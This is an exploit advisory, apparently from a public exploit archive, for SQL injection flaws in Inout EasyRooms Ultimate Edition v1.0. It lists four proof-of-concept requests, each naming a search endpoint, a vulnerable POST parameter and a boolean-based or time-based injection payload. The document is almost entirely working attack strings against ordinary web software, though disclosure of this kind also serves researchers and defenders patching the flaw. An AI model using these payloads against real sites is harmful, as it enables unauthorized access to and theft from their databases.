Exploit Title: Inout EasyRooms Ultimate Edition - SQL Injection

Date: 29.03.2019

Exploit Author: Ahmet Ümit BAYRAM

Vendor Homepage: https://www.inoutscripts.com/products/inout-easyrooms/

Demo Site: http://inout-easyrooms.demo.inoutscripts.net/

Version: v1.0

Tested on: Kali Linux

CVE: N/A

—– PoC 1: SQLi —–

Request: http://localhost/[PATH]/search/rentals Vulnerable Parameter: guests (POST) Payload: guests=-1’ OR 321=6 AND 00046=00046 –

—– PoC 2: SQLi —–

Request: http://localhost/[PATH]/search/searchdetailed Vulnerable Parameter: location (POST) Payload: location=-1’ OR 321=6 AND 000603=000603 or ‘UeNQc30f’=’

—– PoC 3: SQLi —–

Request: http://localhost/[PATH]/search/searchdetailed Vulnerable Parameter: numguest (POST) Payload: numguest=-1’ OR 321=6 AND 000232=000232 –

—– PoC 4: SQLi —–

Request: http://localhost/[PATH]/search/searchdetailed Vulnerable Parameter: property1 (POST) Payload: property1=(select(0)from(select(sleep(0)))v)/’+(select(0)from(select(sleep(0)))v)+’”+(select(0)from(select(sleep(0)))v)+”/